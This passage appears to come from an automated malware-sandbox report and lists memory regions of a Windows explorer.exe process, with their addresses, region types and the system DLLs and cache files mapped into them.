end_va = 0x3af1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003af0000" filename = "" Region: id = 516 start_va = 0x3b00000 end_va = 0x3b01fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b00000" filename = "" Region: id = 517 start_va = 0x3b10000 end_va = 0x3b11fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b10000" filename = "" Region: id = 518 start_va = 0x3b20000 end_va = 0x3b23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b20000" filename = "" Region: id = 519 start_va = 0x3b30000 end_va = 0x3b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b30000" filename = "" Region: id = 520 start_va = 0x3b40000 end_va = 0x3b40fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 521 start_va = 0x3b50000 end_va = 0x3b50fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 522 start_va = 0x3b60000 end_va = 0x3b60fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 523 start_va = 0x3b70000 end_va = 0x3b70fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 524 start_va = 0x3b80000 end_va = 0x3b80fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 525 start_va = 0x3b90000 end_va = 0x3b90fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 526 start_va = 0x3bb0000 end_va = 0x3bd8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll.mui" filename = "\\Windows\\System32\\en-US\\FXSRESM.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fxsresm.dll.mui") Region: id = 527 start_va = 0x3be0000 end_va = 0x3be1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003be0000" filename = "" Region: id = 528 start_va = 0x3bf0000 end_va = 0x3bfffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 529 start_va = 0x3c00000 end_va = 0x3c07fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 530 start_va = 0x3c10000 end_va = 0x3c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c10000" filename = "" Region: id = 531 start_va = 0x3ca0000 end_va = 0x3ca7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\System32\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\urlmon.dll.mui") Region: id = 532 start_va = 0x3cb0000 end_va = 0x3d2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cb0000" filename = "" Region: id = 533 start_va = 0x3d30000 end_va = 0x3d30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d30000" filename = "" Region: id = 534 start_va = 0x3d40000 end_va = 0x3d40fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 535 start_va = 0x3d50000 end_va = 0x3d50fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 536 start_va = 0x3d60000 end_va = 0x3d60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d60000" filename = "" Region: id = 537 start_va = 0x3d70000 end_va = 0x3d70fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 538 start_va = 0x3d80000 end_va = 0x3dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d80000" filename = "" Region: id = 539 start_va = 0x3e00000 end_va = 0x3ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 540 start_va = 0x4000000 end_va = 0x4000fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 541 start_va = 0x4010000 end_va = 0x4010fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 542 start_va = 0x4020000 end_va = 0x4020fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 543 start_va = 0x4040000 end_va = 0x4040fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 544 start_va = 0x4050000 end_va = 0x4050fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui") Region: id = 545 start_va = 0x4060000 end_va = 0x4060fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 546 start_va = 0x4070000 end_va = 0x40effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004070000" filename = "" Region: id = 547 start_va = 0x40f0000 end_va = 0x4107fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 548 start_va = 0x4110000 end_va = 0x418ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 549 start_va = 0x4190000 end_va = 0x4592fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004190000" filename = "" Region: id = 550 start_va = 0x45a0000 end_va = 0x461ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045a0000" filename = "" Region: id = 551 start_va = 0x4620000 end_va = 0x469ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004620000" filename = "" Region: id = 552 start_va = 0x4750000 end_va = 0x47cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004750000" filename = "" Region: id = 553 start_va = 0x47d0000 end_va = 0x48cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047d0000" filename = "" Region: id = 554 start_va = 0x4920000 end_va = 0x499ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004920000" filename = "" Region: id = 555 start_va = 0x49a0000 end_va = 0x5cf4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 556 start_va = 0x5d80000 end_va = 0x5d8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d80000" filename = "" Region: id = 557 start_va = 0x5dd0000 end_va = 0x5e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005dd0000" filename = "" Region: id = 558 start_va = 0x5e50000 end_va = 0x5f4ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 559 start_va = 0x5f50000 end_va = 0x604ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 560 start_va = 0x6050000 end_va = 0x614ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 561 start_va = 0x6150000 end_va = 0x624ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 562 start_va = 0x62c0000 end_va = 0x633ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062c0000" filename = "" Region: id = 563 start_va = 0x6340000 end_va = 0x63bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006340000" filename = "" Region: id = 564 start_va = 0x63e0000 end_va = 0x645ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000063e0000" filename = "" Region: id = 565 start_va = 0x6470000 end_va = 0x647ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006470000" filename = "" Region: id = 566 start_va = 0x64c0000 end_va = 0x64cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064c0000" filename = "" Region: id = 567 start_va = 0x6500000 end_va = 0x657ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006500000" filename = "" Region: id = 568 start_va = 0x65f0000 end_va = 0x666ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000065f0000" filename = "" Region: id = 569 start_va = 0x66a0000 end_va = 0x671ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000066a0000" filename = "" Region: id = 570 start_va = 0x6740000 end_va = 0x67bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006740000" filename = "" Region: id = 571 start_va = 0x6810000 end_va = 0x688ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006810000" filename = "" Region: id = 572 start_va = 0x68b0000 end_va = 0x692ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000068b0000" filename = "" Region: id = 573 start_va = 0x6a00000 end_va = 0x6a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a00000" filename = "" Region: id = 574 start_va = 0x6a90000 end_va = 0x6b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a90000" filename = "" Region: id = 575 start_va = 0x6c00000 end_va = 0x6c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006c00000" filename = "" Region: id = 576 start_va = 0x6c80000 end_va = 0x6daffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ieframe.dll.mui" filename = "\\Windows\\System32\\en-US\\ieframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ieframe.dll.mui") Region: id = 577 start_va = 0x6db0000 end_va = 0x6eaffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 578 start_va = 0x6f10000 end_va = 0x700ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 579 start_va = 0x7010000 end_va = 0x730ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007010000" filename = "" Region: id = 580 start_va = 0x7310000 end_va = 0x740ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 581 start_va = 0x7410000 end_va = 0x750ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 582 start_va = 0x7630000 end_va = 0x76affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007630000" filename = "" Region: id = 583 start_va = 0x76c0000 end_va = 0x773ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000076c0000" filename = "" Region: id = 584 start_va = 0x7790000 end_va = 0x7b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007790000" filename = "" Region: id = 585 start_va = 0x7c90000 end_va = 0x7d8ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 586 start_va = 0x7d90000 end_va = 0x7e8ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 587 start_va = 0x7e90000 end_va = 0x7f8ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 588 start_va = 0x7f90000 end_va = 0x808ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 589 start_va = 0x8090000 end_va = 0x818ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 590 start_va = 0x8190000 end_va = 0x820ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008190000" filename = "" Region: id = 591 start_va = 0x8250000 end_va = 0x82cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008250000" filename = "" Region: id = 592 start_va = 0x82d0000 end_va = 0x9624fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 593 start_va = 0x741a0000 end_va = 0x741a5fff monitored = 0 entry_point = 0x741a1010 region_type = mapped_file name = "ksuser.dll" filename = "\\Windows\\System32\\ksuser.dll" (normalized: "c:\\windows\\system32\\ksuser.dll") Region: id = 594 start_va = 0x75410000 end_va = 0x754f2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 595 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 596 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 597 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 598 start_va = 0x779d0000 end_va = 0x779d6fff monitored = 0 entry_point = 0x779d106c region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 599 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 600 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 601 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 602 start_va = 0xff120000 end_va = 0xff3dffff monitored = 0 entry_point = 0xff14b790 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 603 start_va = 0x7fef0680000 end_va = 0x7fef06bafff monitored = 0 entry_point = 0x7fef0681238 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 604 start_va = 0x7fef06c0000 end_va = 0x7fef0796fff monitored = 0 entry_point = 0x7fef06c1074 region_type = mapped_file name = "searchfolder.dll" filename = "\\Windows\\System32\\SearchFolder.dll" (normalized: "c:\\windows\\system32\\searchfolder.dll") Region: id = 605 start_va = 0x7fef0e90000 end_va = 0x7fef0fe3fff monitored = 0 entry_point = 0x7fef0e97d6c region_type = mapped_file name = "msoshext.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\msoshext.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msoshext.dll") Region: id = 606 start_va = 0x7fef1030000 end_va = 0x7fef10f5fff monitored = 0 entry_point = 0x7fef103f220 region_type = mapped_file name = "msftedit.dll" filename = "\\Windows\\System32\\msftedit.dll" (normalized: "c:\\windows\\system32\\msftedit.dll") Region: id = 607 start_va = 0x7fef1560000 end_va = 0x7fef157efff monitored = 0 entry_point = 0x7fef15657b8 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 608 start_va = 0x7fef1e00000 end_va = 0x7fef1e72fff monitored = 0 entry_point = 0x7fef1e5c7f8 region_type = mapped_file name = "ieproxy.dll" filename = "\\Program Files\\Internet Explorer\\ieproxy.dll" (normalized: "c:\\program files\\internet explorer\\ieproxy.dll") Region: id = 609 start_va = 0x7fef28b0000 end_va = 0x7fef29ebfff monitored = 0 entry_point = 0x7fef28b197c region_type = mapped_file name = "werconcpl.dll" filename = "\\Windows\\System32\\werconcpl.dll" (normalized: "c:\\windows\\system32\\werconcpl.dll") Region: id = 610 start_va = 0x7fef2d10000 end_va = 0x7fef2dacfff monitored = 0 entry_point = 0x7fef2d9d52c region_type = mapped_file name = "fxsapi.dll" filename = "\\Windows\\System32\\FXSAPI.dll" (normalized: "c:\\windows\\system32\\fxsapi.dll") Region: id = 611 start_va = 0x7fef2db0000 end_va = 0x7fef2e86fff monitored = 0 entry_point = 0x7fef2db1254 region_type = mapped_file name = "fxsst.dll" filename = "\\Windows\\System32\\FXSST.dll" (normalized: "c:\\windows\\system32\\fxsst.dll") Region: id = 612 start_va = 0x7fef2e90000 end_va = 0x7fef2ec0fff monitored = 0 entry_point = 0x7fef2e91b24 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 613 start_va = 0x7fef2ed0000 end_va = 0x7fef2f24fff monitored = 0 entry_point = 0x7fef2ed26e4 region_type = mapped_file name = "hgcpl.dll" filename = "\\Windows\\System32\\hgcpl.dll" (normalized: "c:\\windows\\system32\\hgcpl.dll") Region: id = 614 start_va = 0x7fef2f30000 end_va = 0x7fef2faefff monitored = 0 entry_point = 0x7fef2f31070 region_type = mapped_file name = "imapi2.dll" filename = "\\Windows\\System32\\imapi2.dll" (normalized: "c:\\windows\\system32\\imapi2.dll") Region: id = 615 start_va = 0x7fef2fb0000 end_va = 0x7fef3071fff monitored = 0 entry_point = 0x7fef2fd04b4 region_type = mapped_file name = "actioncenter.dll" filename = "\\Windows\\System32\\ActionCenter.dll" (normalized: "c:\\windows\\system32\\actioncenter.dll") Region: id = 616 start_va = 0x7fef3080000 end_va = 0x7fef32aafff monitored = 0 entry_point = 0x7fef3081f00 region_type = mapped_file name = "synccenter.dll" filename = "\\Windows\\System32\\SyncCenter.dll" (normalized: "c:\\windows\\system32\\synccenter.dll") Region: id = 617 start_va = 0x7fef32b0000 end_va = 0x7fef3303fff monitored = 0 entry_point = 0x7fef32b104c region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 618 start_va = 0x7fef3310000 end_va = 0x7fef3ec6fff monitored = 0 entry_point = 0x7fef3311bd8 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 619 start_va = 0x7fef3ed0000 end_va = 0x7fef3f84fff monitored = 0 entry_point = 0x7fef3ef1cd0 region_type = mapped_file name = "bthprops.cpl" filename = "\\Windows\\System32\\bthprops.cpl" (normalized: "c:\\windows\\system32\\bthprops.cpl") Region: id = 620 start_va = 0x7fef3f90000 end_va = 0x7fef3fe7fff monitored = 0 entry_point = 0x7fef3f930f0 region_type = mapped_file name = "srchadmin.dll" filename = "\\Windows\\System32\\srchadmin.dll" (normalized: "c:\\windows\\system32\\srchadmin.dll") Region: id = 621 start_va = 0x7fef3ff0000 end_va = 0x7fef4034fff monitored = 0 entry_point = 0x7fef3ff4190 region_type = mapped_file name = "qagent.dll" filename = "\\Windows\\System32\\QAGENT.DLL" (normalized: "c:\\windows\\system32\\qagent.dll") Region: id = 622 start_va = 0x7fef4040000 end_va = 0x7fef404cfff monitored = 0 entry_point = 0x7fef4047104 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 623 start_va = 0x7fef4050000 end_va = 0x7fef40adfff monitored = 0 entry_point = 0x7fef408a7fc region_type = mapped_file name = "wwanapi.dll" filename = "\\Windows\\System32\\WWanAPI.dll" (normalized: "c:\\windows\\system32\\wwanapi.dll") Region: id = 624 start_va = 0x7fef40b0000 end_va = 0x7fef40b6fff monitored = 0 entry_point = 0x7fef40b1b24 region_type = mapped_file name = "wlanutil.dll" filename = "\\Windows\\System32\\wlanutil.dll" (normalized: "c:\\windows\\system32\\wlanutil.dll") Region: id = 625 start_va = 0x7fef40c0000 end_va = 0x7fef40dffff monitored = 0 entry_point = 0x7fef40c1010 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 626 start_va = 0x7fef40e0000 end_va = 0x7fef411efff monitored = 0 entry_point = 0x7fef40e12c0 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 627 start_va = 0x7fef4330000 end_va = 0x7fef434efff monitored = 0 entry_point = 0x7fef4333580 region_type = mapped_file name = "qutil.dll" filename = "\\Windows\\System32\\QUTIL.DLL" (normalized: "c:\\windows\\system32\\qutil.dll") Region: id = 628 start_va = 0x7fef4350000 end_va = 0x7fef450cfff monitored = 0 entry_point = 0x7fef4351010 region_type = mapped_file name = "pnidui.dll" filename = "\\Windows\\System32\\pnidui.dll" (normalized: "c:\\windows\\system32\\pnidui.dll") Region: id = 629 start_va = 0x7fef4510000 end_va = 0x7fef4548fff monitored = 0 entry_point = 0x7fef4511240 region_type = mapped_file name = "portabledevicetypes.dll" filename = "\\Windows\\System32\\PortableDeviceTypes.dll" (normalized: "c:\\windows\\system32\\portabledevicetypes.dll") Region: id = 630 start_va = 0x7fef4550000 end_va = 0x7fef456ffff monitored = 0 entry_point = 0x7fef4551298 region_type = mapped_file name = "wpdshserviceobj.dll" filename = "\\Windows\\System32\\WPDShServiceObj.dll" (normalized: "c:\\windows\\system32\\wpdshserviceobj.dll") Region: id = 631 start_va = 0x7fef4570000 end_va = 0x7fef457ffff monitored = 0 entry_point = 0x7fef45795dc region_type = mapped_file name = "alttab.dll" filename = "\\Windows\\System32\\AltTab.dll" (normalized: "c:\\windows\\system32\\alttab.dll") Region: id = 632 start_va = 0x7fef4580000 end_va = 0x7fef480afff monitored = 0 entry_point = 0x7fef4586f5c region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 633 start_va = 0x7fef4810000 end_va = 0x7fef4883fff monitored = 0 entry_point = 0x7fef48454c8 region_type = mapped_file name = "dxp.dll" filename = "\\Windows\\System32\\DXP.dll" (normalized: "c:\\windows\\system32\\dxp.dll") Region: id = 634 start_va = 0x7fef4890000 end_va = 0x7fef4900fff monitored = 0 entry_point = 0x7fef48cecc4 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 635 start_va = 0x7fef4910000 end_va = 0x7fef4978fff monitored = 0 entry_point = 0x7fef4911198 region_type = mapped_file name = "prnfldr.dll" filename = "\\Windows\\System32\\prnfldr.dll" (normalized: "c:\\windows\\system32\\prnfldr.dll") Region: id = 636 start_va = 0x7fef4a50000 end_va = 0x7fef4a70fff monitored = 0 entry_point = 0x7fef4a573a0 region_type = mapped_file name = "uianimation.dll" filename = "\\Windows\\System32\\UIAnimation.dll" (normalized: "c:\\windows\\system32\\uianimation.dll") Region: id = 637 start_va = 0x7fef4af0000 end_va = 0x7fef4bacfff monitored = 0 entry_point = 0x7fef4af1ea4 region_type = mapped_file name = "portabledeviceapi.dll" filename = 